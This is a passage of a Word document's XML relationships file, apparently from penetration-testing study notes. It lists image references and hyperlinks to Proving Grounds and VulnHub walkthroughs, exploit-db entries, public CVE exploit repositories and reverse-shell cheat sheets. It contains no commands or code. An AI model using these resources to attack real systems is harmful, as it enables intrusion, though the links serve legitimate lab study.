Target="https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/main/NtObjectManager/NtTokenFunctions.ps1" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.png"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp" TargetMode="External"/><Relationship Id="rId1180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image414.png"/><Relationship Id="rId1181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image439.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image408.png"/><Relationship Id="rId1182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image457.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image560.png"/><Relationship Id="rId594" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Input_Field_Separators" TargetMode="External"/><Relationship Id="rId1183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image543.png"/><Relationship Id="rId593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId1184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ishsome.medium.com/proving-ground-djinn3-walk-through-96c92bda7942" TargetMode="External"/><Relationship Id="rId592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image380.png"/><Relationship Id="rId1185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId1186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image413.png"/><Relationship Id="rId1187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-stapler-464f2a8aa6dc" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/bbscute-write-up-walkthrough-offsec-provinggrounds-vulnhub-05bad5754e72" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.powershellgallery.com/packages/NtObjectManager/1.1.33" TargetMode="External"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-billyboss-5c69bf508e5d" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/gaara-write-up-provinggrounds-vulnhub-0168a5beb32e" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.powershellgallery.com/packages/NtObjectManager/1.1.33" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Input_Field_Separators" TargetMode="External"/><Relationship Id="rId1136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId1378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-dvr4-97f47b09bdc9" TargetMode="External"/><Relationship Id="rId1137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image405.png"/><Relationship Id="rId1379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45296" TargetMode="External"/><Relationship Id="rId1138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image441.png"/><Relationship Id="rId1139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image479.png"/><Relationship Id="rId789" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image186.png"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs/git" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image421.png"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image182.png"/><Relationship Id="rId787" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image409.png"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image347.png"/><Relationship Id="rId786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@polygonben/linux-privilege-escalation-wildcards-with-tar-f79ab9e407fa" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitforwindows.org/" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image485.png"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitforwindows.org/" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId781" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image518.png"/><Relationship Id="rId1370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abyssal_bloom/proving-grounds-bitforge-walkthrough-oscp-9aeb4fed4080" TargetMode="External"/><Relationship Id="rId780" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.png"/><Relationship Id="rId1371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@gayemans1003/offsec-proving-grounds-zab-walkthrough-4092a2c8c904" TargetMode="External"/><Relationship Id="rId1130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-walla-walkthrough-2e0c33eb284b" TargetMode="External"/><Relationship Id="rId1372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image490.png"/><Relationship Id="rId1131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xffsec.com/handbook/shells/restricted-shells/" TargetMode="External"/><Relationship Id="rId1373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image401.png"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@idanbt1993/hackthebox-cascade-walkthrough-d39091d63028" TargetMode="External"/><Relationship Id="rId785" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/wildcards-spare-tricks.html" TargetMode="External"/><Relationship Id="rId1132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xffsec.com/handbook/shells/restricted-shells/" TargetMode="External"/><Relationship Id="rId1374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image282.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gitlab.com/exploit-database/exploitdb" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/squid22/PostgreSQL_RCE" TargetMode="External"/><Relationship Id="rId784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image521.png"/><Relationship Id="rId1133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jserna4510/dc-2-walkthrough-682ae78c7ed6" TargetMode="External"/><Relationship Id="rId1375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hxlxmj/%EF%B8%8F-spidersociety-a-full-walkthrough-395ed6cd13f4" TargetMode="External"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image366.png"/><Relationship Id="rId783" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-zipper-proving-ground-practice-31be416094b8" TargetMode="External"/><Relationship Id="rId1134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId1376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbiosX/Default-Credentials/blob/master/PostgreSQL-Default-Password-List.md" TargetMode="External"/><Relationship Id="rId782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId1135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo" TargetMode="External"/><Relationship Id="rId1377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-dvr4-walkthrough-b97374d3733f" TargetMode="External"/><Relationship Id="rId1125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image494.png"/><Relationship Id="rId1367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId1126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image433.png"/><Relationship Id="rId1368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId1127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-play-pwned1-walkthrough-651ce326d091" TargetMode="External"/><Relationship Id="rId1369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image442.png"/><Relationship Id="rId1128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image195.png"/><Relationship Id="rId1129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image384.png"/><Relationship Id="rId778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image562.png"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/1518" TargetMode="External"/><Relationship Id="rId777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image330.png"/><Relationship Id="rId776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId533" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image482.png"/><Relationship Id="rId775" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.png"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bdsalazar/proving-grounds-nibbles-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-918727ec6b25" TargetMode="External"/><Relationship Id="rId538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image416.png"/><Relationship Id="rId770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-61-proving-grounds-lavita-05d148d4fbfc" TargetMode="External"/><Relationship Id="rId1360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@kism37/spx-offsecpg-walkthrough-765be7d9a717" TargetMode="External"/><Relationship Id="rId1361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mu.aktepe18/spx-proving-ground-walk-through-57590e101bc2" TargetMode="External"/><Relationship Id="rId1120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://courses.tib3rius.com/courses/linux-privilege-escalation-for-oscp-beyond/lectures/43490109" TargetMode="External"/><Relationship Id="rId1362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/vmdak-proving-grounds-9c8a2bc4960a" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sudsy-fireplace-912.notion.site/Pebbles-from-Proving-Grounds-without-SQLMap-by-Luis-Moret-lainkusanagi-23b29df77e6946a6bb8cb213a76a9ac8" TargetMode="External"/><Relationship Id="rId774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId1121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId1363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/52017" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/1518" TargetMode="External"/><Relationship Id="rId773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.png"/><Relationship Id="rId1122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/blogger-walkthrough-a6d064b8608e" TargetMode="External"/><Relationship Id="rId1364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image184.png"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@tacitPanda/sams-ctf-writeup-offsec-proving-grounds-ffacc098282b" TargetMode="External"/><Relationship Id="rId772" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-70-proving-grounds-roquefort-4328214f4da3" TargetMode="External"/><Relationship Id="rId1123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId1365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/vmdak-proving-grounds-9c8a2bc4960a" TargetMode="External"/><Relationship Id="rId771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image565.png"/><Relationship Id="rId1124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId1366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/godylockz/CVE-2024-23897" TargetMode="External"/><Relationship Id="rId1158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image286.png"/><Relationship Id="rId1159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image168.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.stackexchange.com/questions/146757/cannot-figure-out-how-to-bypass-this-function-for-lfi" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://muzec0318.github.io/posts/PG/assertion101.html" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1RhQmUIfMuqZH7pFYgjnknrBvujfXIy3KbHfP1YIMHg4/edit?tab=t.0#heading=h.po7210r2o4xv" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985" TargetMode="External"/><Relationship Id="rId1390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image377.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/03/26/katana-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId1391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vimschool.netlify.app/introduction/" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angelica.gitbook.io/hacktricks/pentesting-web/file-inclusion/lfi2rce-via-phpinfo" TargetMode="External"/><Relationship Id="rId1150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId1392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/roughiz/lfito_rce?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId1151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sumo-81-100-7de98134702" TargetMode="External"/><Relationship Id="rId1393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId1152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image288.png"/><Relationship Id="rId1153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/23/shakabrah-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1eQuumOf-4w7p0vGKRx-f9MmRgVOLEM2Ra5TsvgJv4h0/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId1154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Fasil713/fish-pg-walkthrough-e844a4f5c4bf" TargetMode="External"/><Relationship Id="rId1155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image340.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecwriteups.com/proving-grounds-practice-dvr4-walkthrough-b97374d3733f" TargetMode="External"/><Relationship Id="rId1156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://belcyber.medium.com/dc-9-walkthrough-vulnhub-b87a63c7d6f9" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mthbernardes/rsg" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@kism37/spx-offsecpg-walkthrough-765be7d9a717" TargetMode="External"/><Relationship Id="rId1157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://belcyber.medium.com/dc-9-walkthrough-vulnhub-b87a63c7d6f9" TargetMode="External"/><Relationship Id="rId1147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://spawn.sh" TargetMode="External"/><Relationship Id="rId1389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId1148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits" TargetMode="External"/><Relationship Id="rId1149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@rzashirinov38/driftingblues-6-vulnhub-walkthrough-8db6ecdb3b46" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-slort-4225caca9373" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image335.png"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-authby-7d0391b0897c" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image370.png"/><Relationship Id="rId799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image339.png"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://revshells.com" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/besimorhino/powercat" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image535.png"/><Relationship Id="rId797" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@MEGAZORDI/oscp-practice-proving-grounds-fired-99745bfe2977" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-medjed-7570cbbea087" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId1380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50130" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.png"/><Relationship Id="rId792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId1381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Fasil713/fish-pg-walkthrough-e844a4f5c4bf" TargetMode="External"/><Relationship Id="rId791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId1140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sublimetext.com/docs/linux_repositories.html" TargetMode="External"/><Relationship Id="rId1382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Fasil713/fish-pg-walkthrough-e844a4f5c4bf" TargetMode="External"/><Relationship Id="rId790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId1141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/48793" TargetMode="External"/><Relationship Id="rId1383" 